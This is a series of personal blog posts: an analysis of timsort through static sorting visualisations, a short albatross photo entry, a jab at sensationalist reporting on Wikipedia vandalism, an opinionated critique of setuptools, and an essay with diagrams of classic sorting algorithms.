<p>Before you go on, you might first want to take a look at the <a href="https://corte.si/posts/code/visualisingsorting/">original
post</a> for an explanation of how the
diagrams are constructed and some related caveats.</p>
<h2 id="inspecting-timsort">Inspecting timsort</h2>
<p>The first step was to get hold of the progressive sorting data I needed for the
visualisation. The way timsort is implemented has two properties that helped
here - firstly, it's largely in-place, and secondly, when interrupted by an
exception in the __cmp__ method of one of the elements it is sorting, it
leaves the array partially sorted. The pleasant result is that I could get all
the data I needed in pure Python, without instrumenting the interpreter source.
A link to the code is at the bottom of this post.</p>
<h2 id="a-first-guess-at-the-algorithm">A first guess at the algorithm</h2>
<p>The first thing I did was to see if I could get a feel for timsort straight
from the visualisation, without looking at the implementation (yes, I'm
cheating slightly, since I already had an idea of what I would see). Here's
timsort sorting a shuffled array of 64 elements:</p>
<div class="media">
<a href="64r-tim.png">
<img src="64r-tim.png" />
</a>
<div class="subtitle">
timsort - 64 elements
</div>
</div>
<p>It's immediately clear that timsort has divided the data up into two blocks of
32 elements. The blocks are pre-sorted in turn (the first two "triangles" of
activity, reading from left to right), before being merged together in the final
step (the cross-hatch pattern at the right of the diagram). Looking closer, it's
even possible to tell that the pre-sorting seems to be using insertion sort -
compare the distinctive triangular pattern here with the insertion sort
visualisation in the <a href="https://corte.si/posts/code/visualisingsorting/">previous post</a>.
We can confirm this by taking the same data, and running it through an insertion
sort visualisation. Here's the first block of 32 elements sorted by insertion
sort:</p>
<div class="media">
<a href="half.png">
<img src="half.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<p>As you can see, this sorting sequence is identical to the one in the upper-left
part of the timsort diagram. A similar bit of hackery would show that the final
merge is done with mergesort. Ok, so at this point, we can take a stab at a
broad outline of the timsort algoritm: break the data up into blocks, pre-sort
those blocks using insertion sort, and then merge the blocks together using
mergesort.</p>
<p>This is pretty good going for quick inspection of a single diagram.</p>
<h2 id="what-s-actually-happening">What's actually happening</h2>
<p>Flicking to the <a href="http://bugs.python.org/file4451/timsort.txt">cheat
sheet</a>, we can see that this guess is almost right. The business-end of
timsort is a mergesort that operates on runs of pre-sorted elements. A minimum
run length <strong>minrun</strong> is chosen to make sure the final merges are as balanced as
possible - for 64 elements, <strong>minrun</strong> happens to be 32. Before the merges
begin, a single pass is made through the data to detect pre-existing runs of
sorted elements. Descending runs are handled by simply reversing them in place.
If the resultant run length is less than <strong>minrun</strong>, it is boosted to <strong>minrun</strong>
using insertion sort. On a shuffled array with no significant pre-existing runs,
this process looks exactly like our guess above: pre-sorting blocks of
<strong>minrun</strong> elements using insertion sort, before merging with merge sort.</p>
<p>We can see a bit more detail by giving timsort the type of data it excels at -
a partially sorted array:</p>
<div class="media">
<a href="combo.png">
<img src="combo-annotated.png" />
</a>
<div class="subtitle">
timsort - 64 elements
</div>
</div>
<p>Now, looking at the marked progression from left to right:</p>
<ul>
<li><strong>1)</strong> timsort finds a descending run, and reverses the run in-place. This is done
directly on the array of pointers, so seems "instant" from our vantage point.</li>
<li><strong>2)</strong> The run is now boosted to length <strong>minrun</strong> using insertion sort.</li>
<li><strong>3)</strong> No run is detected at the beginning of the next block, and insertion sort
is used to sort the entire block. Note that the sorted elements at the bottom
of this block are not treated specially - timsort doesn't detect runs that
start in the middle of blocks being boosted to <strong>minrun</strong>.</li>
<li><strong>4)</strong> Finally, mergesort is used to merge the runs.</li>
</ul>
<p>Of course, there's a lot that's not covered here: merge order, stability, the
secondary memory requirements of the algorithm, and so forth. Maybe I'll get to
some of these in a follow-up post. That said, I think this is still quite a
reasonable high-level pictorial guide to timsort.</p>
<p>I relied heavily on <a href="http://bugs.python.org/file4451/timsort.txt">Uncle
Tim's own description of the algorithm</a> in writing this post - if you're
interested in timsort, this document is definitely mandatory reading.</p>
<h2 id="the-code">The Code</h2>
<p>I've brushed up the code I included in my previous post and put it on <a
href="http://github.com/cortesi/sortvis/tree/master">github</a>. You can check
it out like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">git</span><span style="color:#c0c5ce;"> clone git://github.com/cortesi/sortvis.git
</span></code></pre>
Buller's Albatross
2009-07-12T00:00:00+00:00
2009-07-12T00:00:00+00:00
https://corte.si/posts/photos/bullers/
<p>An encounter with a magnificent bird today - Buller's Albatross. It glided in
to the side of the boat we were in to check if we had any fish, but took off
disappointed when it turned out we did not:</p>
<center>
<a href="http://www.flickr.com/photos/8268815@N08/3715192684/" title="Buller's Albatross by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2610/3715192684_fae89809e5.jpg" width="500" height="189" alt="Buller's Albatross" /></a>
</center>
How to become a cyber bandit
2008-06-03T00:00:00+00:00
2008-06-03T00:00:00+00:00
https://corte.si/posts/security/badreporting/
<p>I came accross a hilariously inept bit of tech reporting today, courtesy of the
Sydney Morning Herald. Apparently the Wikipedia page for Mick Keelty,
Australia's Federal Police Commissioner, was vandalised last week. Hardly
earth-shattering, right? Just revert the changes, and move on. To a
sensation-hungry hack without the faintest clue what Wikipedia is, however, this
looks like a Story. More particularly, it looks like a story entitled "<a
href="http://www.smh.com.au/news/technology/cyber-bandit-sabotages-top-cop/2008/05/31/1212258621186.html">Cyber
bandit sabotages top cop</a>".</p>
<p>The article gives a minutely detailed rundown of the rather juvenile vandalism
(apparently perpetrated by a not very imaginative 13-year-old), and is
accompanied by a stock photo showing a depressed-looking Keelty, evidently
meditating on the deep unfairness of it all. The Wikipedia vandal is not just a
"cyber bandit" - he is also referred to as a "hacker" throughout. The icing on
the cake, however, is what has to be a mis-quote from <a
href="http://en.wikipedia.org/wiki/Angela_Beesley">Angela Beesley</a>:</p>
<blockquote>
<p>Wikimedia Foundation Advisory Board chairwoman Angela Beesley said the person
who made the edits infiltrated the site from outside.</p>
</blockquote>
<p>Infiltrated Wikipedia from the outside? You don't say.</p>
setuptools sucks
2007-06-18T00:00:00+00:00
2007-06-18T00:00:00+00:00
https://corte.si/posts/code/setuptoolssucks/
<p>One of the epic conflicts of our time is being waged between two software design
philosophies (bear with me here). Those who follow <strong>Design Philosophy A</strong> trust
their users. Software is designed to be transparent and easy to inspect. Users
are provided with simple and direct ways to control behaviour, and their choices
are respected. Software developers avoid guessing the user's intent, since users
can be trusted to do the sensible thing themselves. Those who follow <strong>Design
Philosophy B</strong> think their users are idiots. Software is therefore opaque and
difficult to inspect, because users wouldn't understand what is going on, and
should be prevented from even trying. The developer's guess is always more
trustworthy than the user's command. Users are robbed of options, because if we
give the user too much control, they'll just fuck things up.</p>
<p>Philosophy A has given you the open source movement, Unix and the Internet.
Philosophy B has given you the Microsoft Paperclip, DRM and an endless stream of
clueless MCSEs. Philosophy A stands for open standards, free information
exchange, and user control. Philosophy B restricts how you can use information
stored on your own computer, violates your privacy, and puts the interests of
software makers ahead of that of the user. In corner A stands Richard Stallman,
Linus Torvalds and Theo de Raadt, dressed in light and armed with flaming
swords. In corner B, wreathed in shadow, stands Bill Gates, a cohort of ignorant
greedy politicians and a dark army of patent lawyers.</p>
<p>It is against this epic background that I invite you to consider another player
on the side of darkness: <a
href="http://peak.telecommunity.com/DevCenter/setuptools">setuptools</a>. No, I
don't think <a href="http://dirtsimple.org/">Phillip J. Eby</a> is out to take
control of your computer and leech your bank account details (though you might
well prefer this to his attempts to <a
href="http://dirtsimple.org/2007/02/how-not-to-be-loser.html">de-activate your
loser circuit</a>). I surely do believe, though, that he thinks you are an
idiot. Because setuptools, again and again, makes some decidedly Philosophy B
design decisions. Witness:</p>
<ul>
<li>Setuptools is nosy. It deduces things magically from the version control
system you use, so when you enter the Brave New World of <a href="
http://git.or.cz/">distributed versioning</a>, all your build and
distribution scripts silently malfunction.</li>
<li>Setuptools is needlessly opaque. <a
href="http://peak.telecommunity.com/DevCenter/PythonEggs">Eggs</a> break
simple transparencies we currently take for granted - for example, we lose
the ability to trivially inspect installed libraries with a pager, or to
easily list the contents of an installed module. They also complicate more
subtle things - because eggs are compressed, project data file access becomes
a pain. If you need direct file access, you need to use even MORE setuptools
magic to unpack project data files to a temporary directory.</li>
<li>Setuptools is obstinate. It will automatically insert .eggs at the head of
your sys.path to make sure they get imported in preference to any existing
libraries. If I insert something into sys.path (say, for instance, to run a
test suite against the development version of my library), I do NOT want my
distribution mechanism to over-ride me. And no, using the setuptools
development mode magic is not a satisfactory answer.</li>
</ul>
<p>This type of intrusive design is disrespectful to users. Whenever you prefer to
trust your own imperfect guesses, rather than letting the user specify what they
want, you are disrespectful to your users. Whenever you needlessly make a system
obscure to inspection, you are disrespectful to your users. Whenever you allow
your software to spill beyond its rightful bounds (by, for example, getting
intimate with my version control system), you are disrespectful to your users.</p>
<p>I believe that most people use setuptools because it provides a few simple
pieces of functionality that could easily be added to distutils without the
dross and bad design. Grafting dependencies and better package data management
onto distutils would go about 80% of the way to meeting my modest expectations.
Sadly, in one of those minor tragedies that life is so full of, it appears that
setuptools <a
href="http://mail.python.org/pipermail/python-dev/2006-April/063964.html">wins
by default</a>, simply because the problem domain is so goddamn boring that
no-one else has bothered.</p>
Visualising Sorting Algorithms
2007-04-27T00:00:00+00:00
2007-04-27T00:00:00+00:00
https://corte.si/posts/code/visualisingsorting/
<p><strong>Update</strong> See <a href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p>
<p>I dislike <a
href="http://ftp.csci.csusb.edu/public/class/cs455/cs455_2000/java/InsertionSortLauncher.html">animated</a>
<a href="http://www.cs.ubc.ca/~harrison/Java/sorting-demo.html">sorting</a> <a
href="http://www2.hawaii.edu/~copley/665/HSApplet.html">algorithm</a> <a
href="http://en.wikipedia.org/wiki/Image:Sorting_heapsort_anim.gif">visualisations</a> - there's too much of an air of hocus-pocus about them. Something
impressive and complicated happens on screen, but more often than not the
audience is left mystified. I think their creators must also know that they
have precious little explanatory value, because the better ones are sexed up
with play-by-play doodles, added, one feels, as an apologetic afterthought by
some particularly dorky sportscaster. Nevertheless I've been unable to
find a single attempt to visualise a sorting algorithm statically (if you know
of any, please drop me a line).</p>
<p>So, presented below are the results of a pleasant evening with some nice Scotch
and the third volume of Knuth. First, here's a taster - a static visualisation
of heapsort:</p>
<div class="media">
<a href="heap.png">
<img src="heap.png" />
</a>
<div class="subtitle">
Heapsort
</div>
</div>
<p>I think these simple static visualisations are much clearer than most animated
attempts - and they have the added benefit of also being, to my not entirely
unbiased eye, rather beautiful. You will find more visualisations, source code,
and a tediously long explanation of why I bothered, after the jump.</p>
<h2 id="the-problem">The Problem</h2>
<p>Before I go on, though, bear with me while I press home my point about
animation with a particularly heinous example of the genre. I found the
following specimen on the <a
href="http://en.wikipedia.org/wiki/Bubblesort">Wikipedia page for
Bubblesort</a>:</p>
<div class="media">
<a href="bubble_sort_animation.gif">
<img src="bubble_sort_animation.gif" />
</a>
<div class="subtitle">
Bubblesort visualisation from Wikipedia
</div>
</div>
<p>Now, it is my measured opinion that this animation has all the explanatory power
of a glob of porridge flung against a wall. To see why I say this, try to find
rough answers to the following set of simple questions with reference to it:</p>
<ul>
<li>After what percentage of time is half of the array sorted?</li>
<li>Can you find an element that moved about half the length of the array to
reach its final destination?</li>
<li>What percentage of the array was sorted after 80% of the sorting process?
How about 20%?</li>
<li>Does the number of sorted elements grow linearly or non-linearly with
time (i.e. logarithmically or exponentially)?</li>
</ul>
<p>If you thought that was harder than it needed to be, blame animation. First,
while humans are great at estimating distances in space, they are pretty bad at
estimating distances in time. This is why you had to watch the animation two or
three times to answer the first question. When we translate time to a geometric
length, as is done in any scientific diagram with a time dimension, this
estimation process becomes easy. Second, many questions about sorting algorithms
require us to actively compare the sorting state at two or more different time
points. Since we don't have perfect memories, this is very, very hard in all but
the simplest cases. This leaves us with a strangely one-dimensional view into an
animation - we can see what's on screen at any given moment, but we have to
strain to answer simple questions about, say, rates of change. Which is why the
final question is hard to answer accurately.</p>
<h2 id="finding-flatland">Finding Flatland</h2>
<p>It turns out that it is pretty easy to find a static, two-dimensional encoding
for the sorting process. The specific technique used here only works when the
sorting algorithm is in-place, i.e. does not use any storage external to the
array itself. Some of the algorithms below have been slightly modified from
their standard forms to make sure they have this property. The magnitude of a
number is indicated by shading - higher numbers are darker, and lower numbers
are lighter. We begin on the left hand side with the numbers in a random order,
and the sorting progression plays out until we reach the right hand side with a
sorted sequence. Time, in this particular case, is measured by the number of
"swaps" performed. This means that all swaps are equidistant on the diagram, and
that only a single swap occurs at any point in time. When I refer to "time"
when talking about these diagrams, I am therefore not referring to clock time.</p>
<p>Now, I should be clear at the outset that I haven't tried to pack these
diagrams with as much information as possible. For example, I don't include
tick marks for time units, nor do I explicitly mark algorithm details like
Instead, I've simply tried to produce images that give a clear sense of the
"flow" over time of the algorithms, while simultaneously not being an eyesore.
I might produce some scaled-up annotated versions of the diagrams for some
future post.</p>
<h2 id="bubblesort">Bubblesort</h2>
<div class="media">
<a href="bubble.png">
<img src="bubble.png" />
</a>
<div class="subtitle">
Bubble sort
</div>
</div>
<p>So, lets start with a static visualisation of <a
href="http://en.wikipedia.org/wiki/Bubble_sort">bubblesort</a>. Notice that,
even without any labelling, we can "read off" the answers to all the questions
posed above pretty trivially:</p>
<ul>
<li>The sorted portion of the sequence is clearly visible as a triangular
block in the bottom-right of the image, so we can easily locate the point
at which half the array is sorted, and read off the percentage of time
taken.</li>
<li>Since the start and end positions of each element is visible on the
graph, finding an element that moved about 50% of the length of the array
is simple.</li>
<li>Similarly, the percentage of the array that is sorted at 20% and 80% of
the process can just be read off.</li>
<li>Lastly, we can clearly see that the curve of sorted elements is not
linear, but is probably close to n^2.</li>
</ul>
<p>Other features of the algorithm are also clearer - for instance, the famous
"rabbits" and "turtles" are clearly identifiable. In the diagram the "rabbits"
are the dark lines sweeping down to their positions rapidly, and the turtles
are the lighter lines that gradually curve towards the top right of the image.</p>
<h2 id="heapsort">Heapsort</h2>
<div class="media">
<a href="heap.png">
<img src="heap.png" />
</a>
<div class="subtitle">
Heapsort
</div>
</div>
<p>Now, lets return to the <a
href="http://en.wikipedia.org/wiki/Heapsort">heapsort</a> image at the top of
this article. First, a quick (and superficial) refresher on the algorithm
itself:</p>
<ul>
<li>Step 1: Arrange the elements in the array to form a "heap" -
a data structure that allows us to find the largest element in constant
time.</li>
<li>Step 2: Peel off the largest element, and move it to below the heap.</li>
<li>Step 3: The heap is now disrupted, so we do some work to re-establish the
heap property.</li>
<li>Step 4: Repeat steps 2-3 until the entire array is sorted.</li>
</ul>
<p>Looking at the visualisation, we can see Step 1 clearly - it is the
portion of the diagram before the point where the largest element in the
array is slotted into place. After that, we can see a repeated pattern -
the heap is re-established and the greatest element is moved to below the
heap again and again util the array is sorted.</p>
<p>We can immediately make some quite sophisticated observations. For example, we
can see that although initially establishing the heap is costly,
re-establishing it after the greatest element is removed requires an
approximately constant amount of time throughout the sorting process - meaning
that the time required is relatively independent of the number of items still
in the heap. This is an interesting property that is not immediately obvious
from an analysis of the algorithm itself.</p>
<p>Right - enough prattling! Here is a selection of other visualised algorithms
for your viewing pleasure:</p>
<h2 id="quicksort">Quicksort</h2>
<div class="media">
<a href="quick.png">
<img src="quick.png" />
</a>
<div class="subtitle">
Quicksort
</div>
</div>
<h2 id="selection-sort">Selection Sort</h2>
<div class="media">
<a href="selection.png">
<img src="selection.png" />
</a>
<div class="subtitle">
Selection sort
</div>
</div>
<h2 id="insertion-sort">Insertion Sort</h2>
<div class="media">
<a href="listinsertion.png">
<img src="listinsertion.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<h2 id="shell-sort">Shell Sort</h2>
<div class="media">
<a href="shell.png">
<img src="shell.png" />
</a>
<div class="subtitle">
Shell sort
</div>
</div>
<h2 id="the-code">The Code</h2>
<p><a href="visualise.py">visualise.py</a></p>
<p>This whole thing started partly as an excuse to get familiar with the <a
href="http://cairographics.org">Cairo</a> graphics library. It produces
beautiful, clean images, and appears to be both portable and well designed. It
also comes with a set of Python bindings that are maintained as part of the
project itself - a big plus in my books. Firefox 3 will use Cairo as its
standard rendering back end, which will instantly make it one of the most widely
used vector graphics libraries out there.</p>
<p>The examples on this page were generated using a command somewhat like the
following:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">./visualise.py -l</span><span style="color:#c0c5ce;"> 6</span><span style="color:#bf616a;"> -x</span><span style="color:#c0c5ce;"> 700</span><span style="color:#bf616a;"> -y</span><span style="color:#c0c5ce;"> 300</span><span style="color:#bf616a;"> -n</span><span style="color:#c0c5ce;"> 15
</span></code></pre>
<p><strong>Update 9/8/09</strong>: A newer version of the code is now available on <a
href="http://github.com/cortesi/sortvis/tree/master">github</a>. You can check
it out like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">git</span><span style="color:#c0c5ce;"> clone git://github.com/cortesi/sortvis.git
</span></code></pre>